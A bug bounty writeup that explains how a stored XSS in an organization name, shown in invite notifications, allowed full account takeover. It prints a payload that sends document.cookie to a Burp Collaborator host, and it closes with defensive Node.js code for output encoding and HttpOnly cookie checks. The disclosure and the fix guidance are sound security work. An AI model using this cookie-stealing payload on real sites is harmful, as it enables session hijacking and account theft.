Account takeover via stored XSS
Hi everyone! This is Vikram Naidu, bug bounty hunter from India. Hope you all are safe. This is my first writeup and it is about my recent finding on a private program where I was able to completely take over any user, employee or admin account just by sending an invite email.
We will refer to the website as Target.com. Target.com has many features like creating an organization, inviting users to the organization, assigning different roles to each user, etc. After seeing all these features, I decided to hunt on it for privilege escalation (PE) vulnerabilities. I signed up for an account and went directly to the feature for creating an organization. I gave it an organization name and observed that this input is reflected in many parts of the website, so a quick change of plans: find XSS. I renamed the organization to <script>alert(document.cookie)</script> and visited all the possible endpoints where the text is reflected, but unfortunately no XSS was triggered. I renamed the organization to xyz and moved on to the invite-user feature to check for PE.
As soon as I logged in to my second account in Chrome, there was a notification at the top saying:
If you look at the notification, yes, the company name is stored and reflected in the second account where the invite was received.
Well, now you all know what to do. I instantly went back to the first account and changed the organization name to <script>alert(document.cookie)</script> to check whether the XSS would trigger, and guess what?
The XSS triggered and all the cookies popped. Among these cookies is the authentication token that is responsible for the user session. While logging into my account I had checked via Burp that this Set-Cookie is the only thing responsible for the user session.
To take over the victim's account, I needed to get hold of this cookie value. I decided to modify the payload in such a way that the cookies are sent to an attacker-controlled server. I had read many other writeups and understood a few payloads.
I opened the Burp Collaborator client and modified the payload to: <script>new Image().src="http://burp.burpcollaborator.net/abc.php?output="+document.cookie;</script>. I used this payload and sent an invite to the victim. As soon as the victim logged into his account, the XSS triggered and my Burp Collaborator received an HTTP request with the victim's cookie details.
As you can see in the request, we receive all the cookies. I noted down the authentication cookie, replaced my own cookie with it while logging in, and was logged straight into the victim's account.
Note: In order to take over any account you just need to enter their email and send an invite. Whenever they log in to the account, the attacker receives the cookies.
I reported this vulnerability on 21st July. They patched it and rewarded a bounty on the same day.
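As an added illustration (my own example, not code from the program or the target), a fix for this class of bug comes down to two server-side controls: HTML-encode the organization name wherever it is rendered, including the invite notification, and mark the session cookie HttpOnly so document.cookie cannot read it. The snippet below, in plain Node.js, shows the notification-building step that was vulnerable beside the encoded version, plus a check on a Set-Cookie header; the function and header names are assumptions.

```javascript
// Added example: output encoding for the invite notification and a
// Set-Cookie attribute check. All names are assumptions, not Target.com's code.

// Escape the five characters that let text break out of an HTML text node
// or a quoted attribute value.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the stored organization name is concatenated straight into
// markup, so a name such as <script>alert(document.cookie)</script> runs in
// the invited user's browser when the notification is rendered.
function buildInviteNotificationVulnerable(orgName) {
  return `<div class="notice">You have been invited to join ${orgName}</div>`;
}

// Fixed: the same template with the untrusted value encoded first.
function buildInviteNotification(orgName) {
  return `<div class="notice">You have been invited to join ${escapeHtml(orgName)}</div>`;
}

// A session cookie readable by script can be exfiltrated by any XSS on the
// origin. HttpOnly blocks document.cookie access; Secure and SameSite limit
// transport and cross-site sending. Returns true only if all three are set.
function sessionCookieIsHardened(setCookieHeader) {
  const attrs = setCookieHeader.split(";").slice(1).map((a) => a.trim().toLowerCase());
  return attrs.includes("httponly") && attrs.includes("secure") &&
    attrs.some((a) => a.startsWith("samesite="));
}

// Constructed sample input mirroring the writeup's payload.
const orgName = "<script>alert(document.cookie)</script>";
console.log("vulnerable:", buildInviteNotificationVulnerable(orgName));
console.log("fixed:     ", buildInviteNotification(orgName));
console.log("weak cookie hardened?  ", sessionCookieIsHardened("session=abc123; Path=/"));
console.log("strong cookie hardened?", sessionCookieIsHardened("session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"));
```

Encoding at the rendering step covers every place the name is reflected, which matters here because the same stored value was reflected in several parts of the site.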